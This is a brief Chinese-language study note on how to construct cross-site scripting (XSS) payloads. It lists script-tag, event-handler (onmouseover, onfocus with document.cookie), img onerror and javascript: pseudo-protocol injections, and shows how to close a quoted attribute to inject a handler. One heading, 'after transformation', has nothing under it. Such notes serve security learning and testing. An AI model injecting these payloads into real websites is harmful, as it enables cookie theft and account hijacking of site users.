xss的构造方式

xss的构造方式：

一，尖括号构造 <script>alert(1)</script>

二，事件构造 "onmouseover="alert(1)

"onfocus="alert(document.cookie)

例如：已知输入点，首先先闭合双引号，则构造如下语句

” onmouseover="alert(1)" type="text

<img src="x" onerror="alert(1)">//属性需要加双引号

变形之后：

 三，构造伪协议

<a href=javascript:alert(1)>click on!</a>